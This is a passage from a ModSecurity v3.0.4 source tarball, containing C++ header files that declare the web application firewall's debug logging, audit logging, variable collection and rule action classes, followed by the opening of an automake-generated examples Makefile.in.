{ free(i->url); i->url = NULL; } } static void freeLog(ModSecurityIntervention_t *i) { if (i->log) { free(i->log); i->log = NULL; } } static void free(ModSecurityIntervention_t *i) { freeUrl(i); freeLog(i); } } // namespace intervention #endif #ifdef __cplusplus } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_INTERVENTION_H_ modsecurity-v3.0.4/headers/modsecurity/debug_log.h0000644000175000017500000000276513607066010022600 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #endif #ifndef HEADERS_MODSECURITY_DEBUG_LOG_H_ #define HEADERS_MODSECURITY_DEBUG_LOG_H_ #ifndef __cplusplus typedef struct DebugLog_t DebugLog; #endif #ifdef __cplusplus namespace modsecurity { namespace debug_log { /** @ingroup ModSecurity_CPP_API */ class DebugLog { public: DebugLog() : m_debugLevel(-1), m_fileName("") { } virtual ~DebugLog(); virtual void write(int level, const std::string &msg); virtual void write(int level, const std::string &id, const std::string &uri, const std::string &msg); bool isLogFileSet(); bool isLogLevelSet(); void setDebugLogLevel(int level); void setDebugLogFile(const std::string &fileName, std::string *error); const std::string& getDebugLogFile(); virtual int getDebugLogLevel(); int m_debugLevel; private: std::string m_fileName; }; } // namespace debug_log } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_DEBUG_LOG_H_ modsecurity-v3.0.4/headers/modsecurity/collection/0000755000175000017500000000000013607066010022621 5ustar zimmerlezimmerlemodsecurity-v3.0.4/headers/modsecurity/collection/collections.h0000644000175000017500000000341113607066010025307 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #include #include #include #include #include #endif #include "modsecurity/collection/collection.h" #include "modsecurity/variable_value.h" #ifndef HEADERS_MODSECURITY_COLLECTION_COLLECTIONS_H_ #define HEADERS_MODSECURITY_COLLECTION_COLLECTIONS_H_ #ifndef __cplusplus typedef struct Collections_t Collections; #endif #ifdef __cplusplus namespace modsecurity { namespace collection { class Collections { public: Collections(Collection *global, Collection *ip, Collection *session, Collection *user, Collection *resource); ~Collections(); std::string m_global_collection_key; std::string m_ip_collection_key; std::string m_session_collection_key; std::string m_user_collection_key; std::string m_resource_collection_key; Collection *m_global_collection; Collection *m_ip_collection; Collection *m_session_collection; Collection *m_user_collection; Collection *m_resource_collection; Collection *m_tx_collection; }; } // namespace collection } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_COLLECTION_COLLECTIONS_H_ modsecurity-v3.0.4/headers/modsecurity/collection/collection.h0000644000175000017500000001420213607066010025124 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #include #endif #include "modsecurity/variable_value.h" #ifndef HEADERS_MODSECURITY_COLLECTION_COLLECTION_H_ #define HEADERS_MODSECURITY_COLLECTION_COLLECTION_H_ #ifndef __cplusplus typedef struct Variable_t Variables; #endif #ifdef __cplusplus namespace modsecurity { namespace variables { class KeyExclusions; } namespace collection { class Collection { public: explicit Collection(std::string a) : m_name(a) { } virtual ~Collection() { } virtual void store(std::string key, std::string value) = 0; virtual bool storeOrUpdateFirst(const std::string &key, const std::string &value) = 0; virtual bool updateFirst(const std::string &key, const std::string &value) = 0; virtual void del(const std::string& key) = 0; virtual std::unique_ptr resolveFirst( const std::string& var) = 0; virtual void resolveSingleMatch(const std::string& var, std::vector *l) = 0; virtual void resolveMultiMatches(const std::string& var, std::vector *l, variables::KeyExclusions &ke) = 0; virtual void resolveRegularExpression(const std::string& var, std::vector *l, variables::KeyExclusions &ke) = 0; /* store */ virtual void store(std::string key, std::string compartment, std::string value) { std::string nkey = compartment + "::" + key; store(nkey, value); } virtual void store(std::string key, std::string compartment, std::string compartment2, std::string value) { std::string nkey = compartment + "::" + compartment2 + "::" + key; store(nkey, value); } /* storeOrUpdateFirst */ virtual bool storeOrUpdateFirst(const std::string &key, std::string compartment, const std::string &value) { std::string nkey = compartment + "::" + key; return storeOrUpdateFirst(nkey, value); } virtual bool storeOrUpdateFirst(const std::string &key, std::string compartment, std::string compartment2, const std::string &value) { std::string nkey = compartment + "::" + compartment2 + "::" + key; return storeOrUpdateFirst(nkey, value); } /* updateFirst */ virtual bool updateFirst(const std::string &key, std::string compartment, const std::string &value) { std::string nkey = compartment + "::" + key; return updateFirst(nkey, value); } virtual bool updateFirst(const std::string &key, std::string compartment, std::string compartment2, const std::string &value) { std::string nkey = compartment + "::" + compartment2 + "::" + key; return updateFirst(nkey, value); } /* del */ virtual void del(const std::string& key, std::string compartment) { std::string nkey = compartment + "::" + key; del(nkey); } virtual void del(const std::string& key, std::string compartment, std::string compartment2) { std::string nkey = compartment + "::" + compartment2 + "::" + key; del(nkey); } /* resolveFirst */ virtual std::unique_ptr resolveFirst(const std::string& var, std::string compartment) { std::string nkey = compartment + "::" + var; return resolveFirst(nkey); } virtual std::unique_ptr resolveFirst(const std::string& var, std::string compartment, std::string compartment2) { std::string nkey = compartment + "::" + compartment2 + "::" + var; return resolveFirst(nkey); } /* resolveSingleMatch */ virtual void resolveSingleMatch(const std::string& var, std::string compartment, std::vector *l) { std::string nkey = compartment + "::" + var; resolveSingleMatch(nkey, l); } virtual void resolveSingleMatch(const std::string& var, std::string compartment, std::string compartment2, std::vector *l) { std::string nkey = compartment + "::" + compartment2 + "::" + var; resolveSingleMatch(nkey, l); } /* resolveMultiMatches */ virtual void resolveMultiMatches(const std::string& var, std::string compartment, std::vector *l, variables::KeyExclusions &ke) { std::string nkey = compartment + "::" + var; resolveMultiMatches(nkey, l, ke); } virtual void resolveMultiMatches(const std::string& var, std::string compartment, std::string compartment2, std::vector *l, variables::KeyExclusions &ke) { std::string nkey = compartment + "::" + compartment2 + "::" + var; resolveMultiMatches(nkey, l, ke); } /* resolveRegularExpression */ virtual void resolveRegularExpression(const std::string& var, std::string compartment, std::vector *l, variables::KeyExclusions &ke) { std::string nkey = compartment + "::" + var; resolveRegularExpression(nkey, l, ke); } virtual void resolveRegularExpression(const std::string& var, std::string compartment, std::string compartment2, std::vector *l, variables::KeyExclusions &ke) { std::string nkey = compartment + "::" + compartment2 + "::" + var; resolveRegularExpression(nkey, l, ke); } std::string m_name; }; } // namespace collection } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_COLLECTION_COLLECTION_H_ modsecurity-v3.0.4/headers/modsecurity/audit_log.h0000644000175000017500000001314413607066010022611 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #endif #ifndef HEADERS_MODSECURITY_AUDIT_LOG_H_ #define HEADERS_MODSECURITY_AUDIT_LOG_H_ #include "modsecurity/transaction.h" #ifdef __cplusplus namespace modsecurity { namespace audit_log { namespace writer { class Writer; } /** @ingroup ModSecurity_CPP_API */ class AuditLog { public: AuditLog(); ~AuditLog(); enum AuditLogType { NotSetAuditLogType, SerialAuditLogType, ParallelAuditLogType, HttpsAuditLogType }; enum AuditLogStatus { NotSetLogStatus, OnAuditLogStatus, OffAuditLogStatus, RelevantOnlyAuditLogStatus }; enum AuditLogFormat { NotSetAuditLogFormat, JSONAuditLogFormat, NativeAuditLogFormat }; enum AuditLogParts { /** * Audit log header (mandatory). * */ AAuditLogPart = 2, /** * Request headers. * */ BAuditLogPart = 4, /** * Request body (present only if the request body exists and ModSecurity * is configured to intercept it). * */ CAuditLogPart = 8, /** * Reserved for intermediary response headers; not implemented yet. * */ DAuditLogPart = 16, /** * Intermediary response body (present only if ModSecurity is configured * to intercept response bodies, and if the audit log engine is * configured to record it). Intermediary response body is the same as the * actual response body unless ModSecurity intercepts the intermediary * response body, in which case the actual response body will contain the * error message (either the Apache default error message, or the * ErrorDocument page). * */ EAuditLogPart = 32, /** * Final response headers (excluding the Date and Server headers, which * are always added by Apache in the late stage of content delivery). * */ FAuditLogPart = 64, /** * Reserved for the actual response body; not implemented yet. * */ GAuditLogPart = 128, /** * Audit log trailer. * */ HAuditLogPart = 256, /** * This part is a replacement for part C. It will log the same data as C * in all cases except when multipart/form-data encoding in used. In this * case, it will log a fake application/x-www-form-urlencoded body that * contains the information about parameters but not about the files. This * is handy if you don’t want to have (often large) files stored in your * audit logs. * */ IAuditLogPart = 512, /** * This part contains information about the files uploaded using * multipart/form-data encoding. */ JAuditLogPart = 1024, /** * This part contains a full list of every rule that matched (one per * line) in the order they were matched. The rules are fully qualified and * will thus show inherited actions and default operators. Supported as of * v2.5.0. * */ KAuditLogPart = 2048, /** * Final boundary, signifies the end of the entry (mandatory). * */ ZAuditLogPart = 4096 }; bool setStorageDirMode(int permission); bool setFileMode(int permission); bool setStatus(AuditLogStatus new_status); bool setRelevantStatus(const std::basic_string& new_relevant_status); bool setFilePath1(const std::basic_string& path); bool setFilePath2(const std::basic_string& path); bool setStorageDir(const std::basic_string& path); bool setFormat(AuditLogFormat fmt); int getDirectoryPermission(); int getFilePermission(); int getParts(); bool setParts(const std::basic_string& new_parts); bool setType(AuditLogType audit_type); bool init(std::string *error); bool close(); bool saveIfRelevant(Transaction *transaction); bool saveIfRelevant(Transaction *transaction, int parts); bool isRelevant(int status); int addParts(int parts, const std::string& new_parts); int removeParts(int parts, const std::string& new_parts); bool merge(AuditLog *from, std::string *error); std::string m_path1; std::string m_path2; std::string m_storage_dir; void refCountIncrease() { m_refereceCount++; } bool refCountDecreaseAndCheck() { m_refereceCount--; if (m_refereceCount == 0) { delete this; return true; } return false; } AuditLogFormat m_format; protected: int m_parts; int m_defaultParts = AAuditLogPart | BAuditLogPart | CAuditLogPart | FAuditLogPart | HAuditLogPart | ZAuditLogPart; int m_filePermission; int m_defaultFilePermission = 0640; int m_directoryPermission; int m_defaultDirectoryPermission = 0750; private: AuditLogStatus m_status; AuditLogType m_type; std::string m_relevant; audit_log::writer::Writer *m_writer; int m_refereceCount; }; } // namespace audit_log } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_AUDIT_LOG_H_ modsecurity-v3.0.4/headers/modsecurity/anchored_variable.h0000644000175000017500000000336713607066010024300 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #include #include #include #include #include #include #endif #include "modsecurity/variable_value.h" #ifndef HEADERS_MODSECURITY_ANCHORED_VARIABLE_H_ #define HEADERS_MODSECURITY_ANCHORED_VARIABLE_H_ #ifdef __cplusplus namespace modsecurity { class Transaction; class AnchoredVariable { public: AnchoredVariable(Transaction* t, std::string name); ~AnchoredVariable(); void unset(); void set(const std::string &a, size_t offset); void set(const std::string &a, size_t offset, size_t offsetLen); void append(const std::string &a, size_t offset, bool spaceSeparator = false); void append(const std::string &a, size_t offset, bool spaceSeparator, int size); void evaluate(std::vector *l); std::string * evaluate(); std::unique_ptr resolveFirst(); Transaction *m_transaction; int m_offset; std::string m_name; std::string m_value; private: VariableValue *m_var; }; } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_ANCHORED_VARIABLE_H_ modsecurity-v3.0.4/headers/modsecurity/anchored_set_variable.h0000644000175000017500000000546313607066010025152 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #include #include #include #include #include #include #include #endif #include "modsecurity/variable_value.h" #ifndef HEADERS_MODSECURITY_ANCHORED_SET_VARIABLE_H_ #define HEADERS_MODSECURITY_ANCHORED_SET_VARIABLE_H_ #ifdef __cplusplus namespace modsecurity { class Transaction; namespace Utils { class Regex; } namespace variables { class KeyExclusions; } struct MyEqual { bool operator()(const std::string& Left, const std::string& Right) const { return Left.size() == Right.size() && std::equal(Left.begin(), Left.end(), Right.begin(), [](char a, char b) { return tolower(a) == tolower(b); }); } }; struct MyHash{ size_t operator()(const std::string& Keyval) const { // You might need a better hash function than this size_t h = 0; std::for_each(Keyval.begin(), Keyval.end(), [&](char c) { h += tolower(c); }); return h; } }; class AnchoredSetVariable : public std::unordered_multimap { public: AnchoredSetVariable(Transaction *t, std::string name); ~AnchoredSetVariable(); void unset(); void set(const std::string &key, const std::string &value, size_t offset); void set(const std::string &key, const std::string &value, size_t offset, size_t len); void setCopy(std::string key, std::string value, size_t offset); void resolve(std::vector *l); void resolve(std::vector *l, variables::KeyExclusions &ke); void resolve(const std::string &key, std::vector *l); void resolveRegularExpression(Utils::Regex *r, std::vector *l); void resolveRegularExpression(Utils::Regex *r, std::vector *l, variables::KeyExclusions &ke); std::unique_ptr resolveFirst(const std::string &key); Transaction *m_transaction; std::string m_name; }; } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_ANCHORED_SET_VARIABLE_H_ modsecurity-v3.0.4/headers/modsecurity/actions/0000755000175000017500000000000013607066010022126 5ustar zimmerlezimmerlemodsecurity-v3.0.4/headers/modsecurity/actions/action.h0000644000175000017500000000725313607066010023563 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #endif #include "modsecurity/intervention.h" #include "modsecurity/rule.h" #ifndef HEADERS_MODSECURITY_ACTIONS_ACTION_H_ #define HEADERS_MODSECURITY_ACTIONS_ACTION_H_ #ifdef __cplusplus namespace modsecurity { class Transaction; class Rule; namespace actions { class Action { public: explicit Action(const std::string& _action) : m_isNone(false), temporaryAction(false), action_kind(2), m_name(""), m_parser_payload(""), m_referenceCount(1) { set_name_and_payload(_action); } explicit Action(const std::string& _action, int kind) : m_isNone(false), temporaryAction(false), action_kind(kind), m_name(""), m_parser_payload(""), m_referenceCount(1) { set_name_and_payload(_action); } virtual ~Action() { } virtual std::string evaluate(std::string exp, Transaction *transaction); virtual bool evaluate(Rule *rule, Transaction *transaction); virtual bool evaluate(Rule *rule, Transaction *transaction, std::shared_ptr ruleMessage) { return evaluate(rule, transaction); } virtual bool init(std::string *error) { return true; } virtual bool isDisruptive() { return false; } void set_name_and_payload(const std::string& data) { size_t pos = data.find(":"); std::string t = "t:"; if (data.compare(0, t.length(), t) == 0) { pos = data.find(":", 2); } if (pos == std::string::npos) { m_name = data; return; } m_name = std::string(data, 0, pos); m_parser_payload = std::string(data, pos + 1, data.length()); if (m_parser_payload.at(0) == '\'' && m_parser_payload.size() > 2) { m_parser_payload.erase(0, 1); m_parser_payload.pop_back(); } } int refCountDecreaseAndCheck() { this->m_referenceCount--; if (this->m_referenceCount == 0) { delete this; return 1; } return 0; } void refCountIncrease() { this->m_referenceCount++; } bool m_isNone; bool temporaryAction; int action_kind; std::string m_name; std::string m_parser_payload; /** * * Define the action kind regarding to the execution time. * * */ enum Kind { /** * * Action that are executed while loading the configuration. For instance * the rule ID or the rule phase. * */ ConfigurationKind, /** * * Those are actions that demands to be executed before call the operator. * For instance the tranformations. * * */ RunTimeBeforeMatchAttemptKind, /** * * Actions that are executed after the execution of the operator, only if * the operator returned Match (or True). For instance the disruptive * actions. * */ RunTimeOnlyIfMatchKind, }; private: int m_referenceCount; }; } // namespace actions } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_ACTIONS_ACTION_H_ modsecurity-v3.0.4/examples/0000755000175000017500000000000013607066346016336 5ustar zimmerlezimmerlemodsecurity-v3.0.4/examples/Makefile.in0000644000175000017500000006107413607066346020413 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ subdir = examples ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(pkginclude_HEADERS) \ $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = SOURCES = DIST_SOURCES = RECURSIVE_TARGETS = all-recursive check-recursive cscopelist-recursive \ ctags-recursive dvi-recursive html-recursive info-recursive \ install-data-recursive install-dvi-recursive \ install-exec-recursive install-html-recursive \ install-info-recursive install-pdf-recursive \ install-ps-recursive install-recursive installcheck-recursive \ installdirs-recursive pdf-recursive ps-recursive \ tags-recursive uninstall-recursive am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`; am__vpath_adj = case $$p in \ $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \ *) f=$$p;; \ esac; am__strip_dir = f=`echo $$p | sed -e 's|^.*/||'`; am__install_max = 40 am__nobase_strip_setup = \ srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'` am__nobase_strip = \ for p in $$list; do echo "$$p"; done | sed -e "s|$$srcdirstrip/||" am__nobase_list = $(am__nobase_strip_setup); \ for p in $$list; do echo "$$p $$p"; done | \ sed "s| $$srcdirstrip/| |;"' / .*\//!s/ .*/ ./; s,\( .*\)/[^/]*$$,\1,' | \ $(AWK) 'BEGIN { files["."] = "" } { files[$$2] = files[$$2] " " $$1; \ if (++n[$$2] == $(am__install_max)) \ { print $$2, files[$$2]; n[$$2] = 0; files[$$2] = "" } } \ END { for (dir in files) print dir, files[dir] }' am__base_list = \ sed '$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;s/\n/ /g' | \ sed '$$!N;$$!N;$$!N;$$!N;s/\n/ /g' am__uninstall_files_from_dir = { \ test -z "$$files" \ || { test ! -d "$$dir" && test ! -f "$$dir" && test ! -r "$$dir"; } \ || { echo " ( cd '$$dir' && rm -f" $$files ")"; \ $(am__cd) "$$dir" && rm -f $$files; }; \ } am__installdirs = "$(DESTDIR)$(pkgincludedir)" HEADERS = $(pkginclude_HEADERS) RECURSIVE_CLEAN_TARGETS = mostlyclean-recursive clean-recursive \ distclean-recursive maintainer-clean-recursive am__recursive_targets = \ $(RECURSIVE_TARGETS) \ $(RECURSIVE_CLEAN_TARGETS) \ $(am__extra_recursive_targets) AM_RECURSIVE_TARGETS = $(am__recursive_targets:-recursive=) TAGS CTAGS \ distdir distdir-am am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags DIST_SUBDIRS = $(SUBDIRS) am__DIST_COMMON = $(srcdir)/Makefile.in DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) am__relativize = \ dir0=`pwd`; \ sed_first='s,^\([^/]*\)/.*$$,\1,'; \ sed_rest='s,^[^/]*/*,,'; \ sed_last='s,^.*/\([^/]*\)$$,\1,'; \ sed_butlast='s,/*[^/]*$$,,'; \ while test -n "$$dir1"; do \ first=`echo "$$dir1" | sed -e "$$sed_first"`; \ if test "$$first" != "."; then \ if test "$$first" = ".."; then \ dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \ dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \ else \ first2=`echo "$$dir2" | sed -e "$$sed_first"`; \ if test "$$first2" = "$$first"; then \ dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \ else \ dir2="../$$dir2"; \ fi; \ dir0="$$dir0"/"$$first"; \ fi; \ fi; \ dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \ done; \ reldir="$$dir2" ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ 